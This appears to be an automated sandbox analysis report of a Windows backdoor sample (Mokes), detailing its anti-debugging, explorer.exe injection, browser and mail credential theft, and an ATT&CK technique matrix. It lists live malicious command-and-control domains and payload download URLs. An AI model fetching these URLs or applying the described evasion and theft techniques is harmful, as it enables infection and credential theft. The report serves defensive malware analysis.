                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004049EA LoadLibraryA,GetProcAddress,VirtualProtect,4_2_004049EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C59F5 push dword ptr fs:[00000030h]0_2_008C59F5
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_009260A3 push dword ptr fs:[00000030h]4_2_009260A3
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00409947 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00409947
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0092771C rdtsc 4_2_0092771C
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00409085 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,MoveFileA,GetLastError,__dosmaperr,4_2_00409085
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00409947 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00409947
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0040B33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040B33B
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00409D7C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00409D7C
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0041165B SetUnhandledExceptionFilter,4_2_0041165B

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeDomain query: github.com
                Source: C:\Windows\explorer.exeDomain query: dldsystem.com
                Source: C:\Windows\explorer.exeDomain query: furubujjul.net
                Source: C:\Windows\explorer.exeDomain query: pelegisr.com
                Source: C:\Windows\explorer.exeDomain query: avtlsgosecure.com
                Source: C:\Windows\explorer.exeNetwork Connect: 185.174.137.174 80Jump to behavior
                Source: C:\Windows\explorer.exeFile created: idduhcf.1.drJump to dropped file
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeMemory written: C:\Users\user\AppData\Local\Temp\6246.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 5261ACCJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfThread created: unknown EIP: 5361ACCJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeThread created: unknown EIP: 5321A80Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A2F380Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 6040 base: A2F380 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 6076 base: 7FF69BD28150 value: 90Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exeJump to behavior
                Source: explorer.exe, 00000001.00000000.419226663.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.411309802.0000000005910000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.403872443.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.368088289.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
                Source: explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.403872443.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.368088289.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.403872443.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.368088289.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000001.00000000.367436647.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.402857693.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.318909618.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
                Source: C:\Users\user\Desktop\file.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00418C46
                Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,0_2_0040A84C
                Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,0_2_004138F3
                Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_00412A30
                Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00413285
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,4_2_0040A85C
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_004140C6
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,4_2_0041415E
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,4_2_00413903
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoA,4_2_0040D104
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_004141D2
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,4_2_00412A40
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,4_2_00418AE3
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_00413295
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,4_2_00413B5B
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,4_2_00418B17
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_004143A4
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00418C56
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_00414465
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_004144CC
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoA,4_2_00412563
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,4_2_00414508
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoA,GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,4_2_00418DF3
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,4_2_00413FAF
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00411DEA GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_00411DEA

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 5.2.thduhcf.700e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.710e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.3.thduhcf.710000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.720000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.thduhcf.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.549038342.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 5.2.thduhcf.700e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.710e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.3.thduhcf.710000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.720000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.thduhcf.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.549038342.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium13
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Exploitation for Client Execution
                Boot or Logon Initialization Scripts612
                Process Injection
                2
                Obfuscated Files or Information
                1
                Input Capture
                2
                File and Directory Discovery
                Remote Desktop Protocol1
                Data from Local System
                Exfiltration Over Bluetooth11
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)1
                Software Packing
                1
                Credentials in Registry
                115
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration4
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                DLL Side-Loading
                NTDS431
                Security Software Discovery
                Distributed Component Object Model1
                Input Capture
                Scheduled Transfer125
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                File Deletion
                LSA Secrets121
                Virtualization/Sandbox Evasion
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common11
                Masquerading
                Cached Domain Credentials3
                Process Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items121
                Virtualization/Sandbox Evasion
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job612
                Process Injection
                Proc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Hidden Files and Directories
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 724879 Sample: file.exe Startdate: 17/10/2022 Architecture: WINDOWS Score: 100 54 jamesmillion.xyz 2->54 56 dldsystem.com 2->56 58 7 other IPs or domains 2->58 76 Snort IDS alert for network traffic 2->76 78 Multi AV Scanner detection for domain / URL 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 10 other signatures 2->82 9 file.exe 2->9         started        12 thduhcf 2->12         started        14 idduhcf 2->14         started        signatures3 process4 signatures5 104 Detected unpacking (changes PE section rights) 9->104 106 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->106 108 Maps a DLL or memory area into another process 9->108 16 explorer.exe 17 9->16 injected 110 Checks if the current machine is a virtual machine (disk enumeration) 12->110 112 Creates a thread in another existing process (thread injection) 12->112 process6 dnsIp7 48 dldsystem.com 162.144.15.231, 443, 49708, 49712 UNIFIEDLAYER-AS-1US United States 16->48 50 185.174.137.174, 49693, 80 SUPERSERVERSDATACENTERRU Russian Federation 16->50 52 4 other IPs or domains 16->52 40 C:\Users\user\...\thduhcf:Zone.Identifier, Unknown 16->40 dropped 42 C:\Users\user\AppData\Roaming\thduhcf, Unknown 16->42 dropped 44 C:\Users\user\AppData\Roaming\idduhcf, Unknown 16->44 dropped 46 7 other malicious files 16->46 dropped 68 System process connects to network (likely due to code injection or exploit) 16->68 70 Benign windows process drops PE files 16->70 72 Injects code into the Windows Explorer (explorer.exe) 16->72 74 3 other signatures 16->74 21 69A9.exe 16->21         started        24 8C19.exe 16->24         started        27 explorer.exe 6 16->27         started        29 5 other processes 16->29 file8 signatures9 process10 dnsIp11 84 Detected unpacking (changes PE section rights) 21->84 86 Machine Learning detection for dropped file 21->86 88 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->88 102 3 other signatures 21->102 60 aaa.apiaaaeg.com 45.136.151.102, 49702, 49706, 49713 ENZUINC-US Latvia 24->60 62 star-mini.c10r.facebook.com 157.240.20.35, 443, 49695, 49699 FACEBOOKUS United States 24->62 64 3 other IPs or domains 24->64 90 Antivirus detection for dropped file 24->90 92 Tries to detect virtualization through RDTSC time measurements 24->92 94 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->94 96 Tries to steal Mail credentials (via file / registry access) 27->96 98 Tries to harvest and steal browser information (history, passwords, etc) 27->98 100 Injects a PE file into a foreign processes 29->100 31 6246.exe 12 29->31         started        34 WerFault.exe 3 10 29->34         started        36 WerFault.exe 10 29->36         started        38 conhost.exe 29->38         started        signatures12 process13 dnsIp14 66 api.2ip.ua 162.0.217.254, 443, 49701 ACPCA Canada 31->66

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe39%VirustotalBrowse
                file.exe44%ReversingLabsWin32.Backdoor.Mokes
                file.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\8C19.exe100%AviraHEUR/AGEN.1210630
                C:\Users\user\AppData\Local\Temp\8C19.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\6246.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\69A9.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\837D.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\4316.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\7795.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\7AF0.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLinkDownload
                8.0.6246.exe.400000.6.unpack100%AviraHEUR/AGEN.1223627Download File
                7.0.7795.exe.6c0e67.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                7.0.7795.exe.6c0e67.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.0.837D.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.3.file.exe.720000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                5.3.thduhcf.710000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.0.6246.exe.400000.4.unpack100%AviraHEUR/AGEN.1223627Download File
                7.0.7795.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.3.69A9.exe.21d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.837D.exe.5f0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.0.6246.exe.400000.8.unpack100%AviraHEUR/AGEN.1223627Download File
                9.0.837D.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.0.6246.exe.400000.10.unpack100%AviraHEUR/AGEN.1223627Download File
                5.2.thduhcf.700e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.0.837D.exe.5f0e67.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.3.837D.exe.600000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                10.0.8C19.exe.140000000.1.unpack100%AviraHEUR/AGEN.1201239Download File
                9.0.837D.exe.5f0e67.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.2.6246.exe.400000.0.unpack100%AviraHEUR/AGEN.1223627Download File
                6.2.69A9.exe.6d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                7.2.7795.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.0.6246.exe.400000.7.unpack100%AviraHEUR/AGEN.1223627Download File
                8.0.6246.exe.400000.9.unpack100%AviraHEUR/AGEN.1223627Download File
                6.2.69A9.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                7.2.7795.exe.6c0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                10.0.8C19.exe.140000000.2.unpack100%AviraHEUR/AGEN.1201239Download File
                7.0.7795.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                7.3.7795.exe.6d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                10.0.8C19.exe.140000000.0.unpack100%AviraHEUR/AGEN.1201239Download File
                0.2.file.exe.710e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.0.6246.exe.400000.5.unpack100%AviraHEUR/AGEN.1223627Download File
                5.2.thduhcf.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.837D.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                SourceDetectionScannerLabelLink
                jamesmillion.xyz12%VirustotalBrowse
                avtlsgosecure.com10%VirustotalBrowse
                raw.githubusercontent.com2%VirustotalBrowse
                aaa.apiaaaeg.com1%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://avtlsgosecure.com/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63747&key=f3dd785ba062e51ca3ca0a8858cf60300%Avira URL Cloudsafe
                http://aaa.apiaaaeg.com/0%URL Reputationsafe
                http://nuluitnulo.me/0%URL Reputationsafe
                http://winnlinne.com/lancer/get.php0%URL Reputationsafe
                http://bururutu44org.org/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781adg0%Avira URL Cloudsafe
                http://nvulukuluir.net/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3awal0%Avira URL Cloudsafe
                http://liubertiyyyul.net/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63755&key=d5d0a61724cbb4ad6589c71e993b56b20%Avira URL Cloudsafe
                http://furubujjul.net/0%URL Reputationsafe
                http://youyouumenia5.org/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3a0%Avira URL Cloudsafe
                http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad10%Avira URL Cloudsafe
                http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3aal0%Avira URL Cloudsafe
                http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
                http://guluiiiimnstra.net/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/safe0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad60%Avira URL Cloudsafe
                https://dldsystem.com/7.exe0%Avira URL Cloudsafe
                http://185.174.137.174/s.exe100%Avira URL Cloudmalware
                https://dldsystem.com/jamesp.exe0%Avira URL Cloudsafe
                http://aaa.apiaaaeg.coaa.apiaaaeg.com/0%Avira URL Cloudsafe
                https://pelegisr.com/upload/ChromeSetup.exe0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63737&key=7ab3af34ad464188e35d31bab8ff7aae0%Avira URL Cloudsafe
                http://furubujjul.net/Mozilla/5.00%URL Reputationsafe
